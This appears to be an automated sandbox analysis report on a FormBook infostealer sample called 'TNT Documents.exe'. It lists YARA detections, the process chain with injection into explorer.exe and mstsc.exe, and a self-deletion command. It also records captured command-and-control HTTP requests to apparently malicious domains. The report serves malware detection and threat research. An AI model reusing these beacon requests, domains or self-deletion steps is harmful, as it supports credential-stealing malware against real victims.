                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&amp;4h=7n_DRJGxnRd">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.74982234.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Dec 2, 2021 18:59:48.300111055 CET14611OUTGET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1
                                                                  Host: www.coached.info
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Dec 2, 2021 18:59:48.478606939 CET14611INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 02 Dec 2021 17:59:48 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "61a4f026-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: TNT Documents.exe PID: 4548 Parent PID: 5372

                                                                  General

                                                                  Start time:18:57:47
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x70000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: TNT Documents.exe PID: 6384 Parent PID: 4548

                                                                  General

                                                                  Start time:18:57:59
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:{path}
                                                                  Imagebase:0x130000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: TNT Documents.exe PID: 6400 Parent PID: 4548

                                                                  General

                                                                  Start time:18:58:01
                                                                  Start date:02/12/2021
                                                                  Path:C:\Users\user\Desktop\TNT Documents.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:{path}
                                                                  Imagebase:0xaa0000
                                                                  File size:503808 bytes
                                                                  MD5 hash:F943D9EE79559042BFFF9B4E55270CFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: explorer.exe PID: 3292 Parent PID: 6400

                                                                  General

                                                                  Start time:18:58:07
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff662bf0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: mstsc.exe PID: 6268 Parent PID: 3292

                                                                  General

                                                                  Start time:18:58:34
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                  Imagebase:0xec0000
                                                                  File size:3444224 bytes
                                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Chronological Activities

                                                                  Analysis Process: cmd.exe PID: 1148 Parent PID: 6268

                                                                  General

                                                                  Start time:18:58:39
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del "C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x870000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 4484 Parent PID: 1148

                                                                  General

                                                                  Start time:18:58:41
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff673460000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: TNT Documents.exe PID: 4548 Parent PID: 5372 TNT Documents.exeCOMMON

                                                                    Executed Functions

                                                                    Function 06E71F09, Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _{
                                                                    • API String ID: 0-4197202035
                                                                    • Opcode ID: 6b2bd52bdf9e876b73f0711ed5df653746d8c0202e251333f71dbbf894949e96
                                                                    • Instruction ID: e43bfdad2bb4f56b973784496d2f549e517f39361aa54ab958d1c8ecf0064bb3
                                                                    • Opcode Fuzzy Hash: 6b2bd52bdf9e876b73f0711ed5df653746d8c0202e251333f71dbbf894949e96
                                                                    • Instruction Fuzzy Hash: AD611771E0131A9FDB44CFA6D8816DEFBB2EF89310F289166D509BB214D7349A46CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E755E8, Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: S6
                                                                    • API String ID: 0-2440769531
                                                                    • Opcode ID: 5c3de5636c5fe99a33f76b30665a3f452b46f33dafde91dd7a266ebeb0a990c7
                                                                    • Instruction ID: 382a826a5cc9cc313b8c38ab2d7b5c6cbbb00fa764ac5893a5c5ea90ed3b9664
                                                                    • Opcode Fuzzy Hash: 5c3de5636c5fe99a33f76b30665a3f452b46f33dafde91dd7a266ebeb0a990c7
                                                                    • Instruction Fuzzy Hash: 8121BE71E116188BEB58CFABDC4069EF7F7AFC8210F14D47AC518A6214DB341A558F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E72D81, Relevance: .3, Instructions: 339COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7cb845fc61b179eb0e69ec7db8114dc7519c6f39feb80152c652d50449b06bb4
                                                                    • Instruction ID: 3d495b630641771e64d6e269190ab7d85cf1bbee6f9cdfdb52d8a47cf81cf9e6
                                                                    • Opcode Fuzzy Hash: 7cb845fc61b179eb0e69ec7db8114dc7519c6f39feb80152c652d50449b06bb4
                                                                    • Instruction Fuzzy Hash: 34D15C74E0520ADFDB48CFA5C4858EEFBB2FF88300B14A565D616AB215D7349A42CFD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E72DAA, Relevance: .3, Instructions: 319COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1421fbd5abb1bd6bb9728efaafa6b9f7225f6b64c2a03c2138fd8c7043144326
                                                                    • Instruction ID: a8ff2bee49836534e81cc3a7929a2c2f5e198fc38729da7433b7bb3de049d5a3
                                                                    • Opcode Fuzzy Hash: 1421fbd5abb1bd6bb9728efaafa6b9f7225f6b64c2a03c2138fd8c7043144326
                                                                    • Instruction Fuzzy Hash: FAD14B74D0420ADFDB48CFA5C4858AEFBB2FF88300B14E569D616AB255D734AA42CFD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E72DE8, Relevance: .3, Instructions: 296COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51f7bafccfa9f4ae437cbae9a2e1c0653539494a477c03e069091dd0c72283f6
                                                                    • Instruction ID: 630abcd6a3da5e19ff609ebe2c6236750c88b16ab66250a3d86453f0422cb83f
                                                                    • Opcode Fuzzy Hash: 51f7bafccfa9f4ae437cbae9a2e1c0653539494a477c03e069091dd0c72283f6
                                                                    • Instruction Fuzzy Hash: 02D11A74E0420ADFDB48CFA5C5848AEFBB2FF89300B14E569D615AB255D734AA42CFD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E70C0D, Relevance: .2, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 953865ae882c4edf53c4d32b18f3f217a57b76df31102be9bbe685ffbc14e11e
                                                                    • Instruction ID: 6c7a774347a5f60812141fb223263c081e16b1c172e59b1f925b2f6cd723c206
                                                                    • Opcode Fuzzy Hash: 953865ae882c4edf53c4d32b18f3f217a57b76df31102be9bbe685ffbc14e11e
                                                                    • Instruction Fuzzy Hash: C19107B4E002598FDB48CFA9C880ADEBBB2FF89300F24942AD415BB354D7359942CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E70C38, Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b07cf22a6f0390d1ab4487c8474e896889771aa98a36a11c02b3a29a1872400
                                                                    • Instruction ID: 21ccb074b752dd2305ac6460cb6101b1932d76f7471bbd63bd550257cf6f8cb2
                                                                    • Opcode Fuzzy Hash: 2b07cf22a6f0390d1ab4487c8474e896889771aa98a36a11c02b3a29a1872400
                                                                    • Instruction Fuzzy Hash: 8381C3B4E002198FDB48CFAAD880ADEBBB2FF89300F24942AD519BB354D7759941CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E71498, Relevance: .2, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 216e1426ba4f9e001325fd8ea5eafff7b0194aafd077bea2850ce166e86be00e
                                                                    • Instruction ID: 4c1dddbbabfb51c9922ac152627567bd7f1c66b35aac5a1d017efe84b3ee2e1b
                                                                    • Opcode Fuzzy Hash: 216e1426ba4f9e001325fd8ea5eafff7b0194aafd077bea2850ce166e86be00e
                                                                    • Instruction Fuzzy Hash: 70714974E05309CFDB48CFA6D4405EEFBF2EF89200F28A46AD41AA7254D7348A429F95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E760E8, Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e18f0ff788b2067d0c43d4ef3ef164462b8db9bb44397ad9f03636be1dc949b1
                                                                    • Instruction ID: 1f75b257dece1f68f2d74f4720bd4059ed982aec9f2ca70ca2e147951ac53764
                                                                    • Opcode Fuzzy Hash: e18f0ff788b2067d0c43d4ef3ef164462b8db9bb44397ad9f03636be1dc949b1
                                                                    • Instruction Fuzzy Hash: 12510BB1E016588FEB58CF7B98442AABBF3EFCD211F14C4BA950D97215EB3019868E51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7CFC8, Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c11c57703a1194009a2e51ddd68d7ad60da66fcf8efe11056e9508b477ab3627
                                                                    • Instruction ID: 1484aeb31e535ee9051c1a82ba8a361ca1e7842fa324f774f838b513c661ac05
                                                                    • Opcode Fuzzy Hash: c11c57703a1194009a2e51ddd68d7ad60da66fcf8efe11056e9508b477ab3627
                                                                    • Instruction Fuzzy Hash: CB711771E0562A8FEB68CF66CC447E9B7B6EFC8300F1491EAD50DA7654EB705A818F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E76155, Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 092695500dda315a73f5fd7a3bbe3572a6e3531c4c197980cf1eaf7df0bf16f2
                                                                    • Instruction ID: 395a4c1c244060bb62dce19c1e4607ff6060391d6bd8990a24d6cbbc49602748
                                                                    • Opcode Fuzzy Hash: 092695500dda315a73f5fd7a3bbe3572a6e3531c4c197980cf1eaf7df0bf16f2
                                                                    • Instruction Fuzzy Hash: A5519BB1E016588FEB58CF6B994469EFBF3EFC9304F14D1BAC50DA6215EB3419868E01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E76198, Relevance: .1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0db24b0b29970fb4449122332a462940e9bdf5734b81cb3f19b431dbd865837f
                                                                    • Instruction ID: a7c2f09552f55443f2c19d3111e0527da5a0687164bf54dab73ef1141211c111
                                                                    • Opcode Fuzzy Hash: 0db24b0b29970fb4449122332a462940e9bdf5734b81cb3f19b431dbd865837f
                                                                    • Instruction Fuzzy Hash: A2414071E116188BDB58CF6BDD4469EFBF3AFC8304F14C1BA850DA6214EB340A868E11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06B103D1, Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.300885973.0000000006B10000.00000040.00000001.sdmp, Offset: 06B10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 584008fd05839c529ef1c95ceb6299478744c73c068f1b812613b7c9b8144185
                                                                    • Instruction ID: 625ecd29c8924c71ed39fd34e884c5f78ea1a036c507df69cde95258b012f831
                                                                    • Opcode Fuzzy Hash: 584008fd05839c529ef1c95ceb6299478744c73c068f1b812613b7c9b8144185
                                                                    • Instruction Fuzzy Hash: 51119E70D05228DFDB449FA4D5587FEBBF0AB4A301F54A4A9D401BB291CB348984CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06B103E0, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.300885973.0000000006B10000.00000040.00000001.sdmp, Offset: 06B10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7dc0b8ffc72a203898da14f174647f77ef8a6217dfdfa398f4733dcafee02a51
                                                                    • Instruction ID: 97c9e28e1fe6c41e1b656828e44657350f5ce94b8dda1c6d1f7d5b22580ab9f2
                                                                    • Opcode Fuzzy Hash: 7dc0b8ffc72a203898da14f174647f77ef8a6217dfdfa398f4733dcafee02a51
                                                                    • Instruction Fuzzy Hash: E7115A70D05218DFDB44DFA5D458BEEBBF1AB4E301F54A4A9D405B7290CB388A84CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06B10494, Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.300885973.0000000006B10000.00000040.00000001.sdmp, Offset: 06B10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eba06e71bb1f88ab63224eabb5d89d572c66520e934e7970b95d8115125df224
                                                                    • Instruction ID: 198aaae11f1ad9f178b4319eb06e47674e8a191f47dac0cb62c5c4a53c512997
                                                                    • Opcode Fuzzy Hash: eba06e71bb1f88ab63224eabb5d89d572c66520e934e7970b95d8115125df224
                                                                    • Instruction Fuzzy Hash: F0E02BF084D285DEE7011FA05C906B9BF709B07200F4440CFD041FB152C668C584CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236DB22, Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 8604030beb26121161f3337c86827162d049a73d9fd1f9eb558993199b86bc5f
                                                                    • Instruction ID: a09815fd08237ff6bee5a65a2bd0bbe97d0d1b22e46b734004798a3dbc6462e1
                                                                    • Opcode Fuzzy Hash: 8604030beb26121161f3337c86827162d049a73d9fd1f9eb558993199b86bc5f
                                                                    • Instruction Fuzzy Hash: 6B81A7B1C04388DFDB02CFA4C894ADDBFB1EF4A314F1981AAE558AB262D7349855CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236BBC8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 5894f8b251e1883689292a9d0cf96e9c4f061ad008367da827ae01b58288b859
                                                                    • Instruction ID: b5076e9969ea07ddd3f189042e26699bf5258984846f3528f2edc2bed2de6eb5
                                                                    • Opcode Fuzzy Hash: 5894f8b251e1883689292a9d0cf96e9c4f061ad008367da827ae01b58288b859
                                                                    • Instruction Fuzzy Hash: A9712570A00B058FD724DF6AD44476AB7FAFF88208F008929D486EBB44DB75E946CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E78C50, Relevance: 1.7, APIs: 1, Instructions: 159processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 06E7ED0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: b789623aa675b9596d4968e5531d0a54005152699993def576309343b896d247
                                                                    • Instruction ID: dea92c2fe4db6abf6cf283df23b641885efe587c22db7e0adccb0a44ba5b8109
                                                                    • Opcode Fuzzy Hash: b789623aa675b9596d4968e5531d0a54005152699993def576309343b896d247
                                                                    • Instruction Fuzzy Hash: 61514B71D00358DFDB54CF99C890BDDBBB6BF88304F14849AE848A7250DB309A89CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

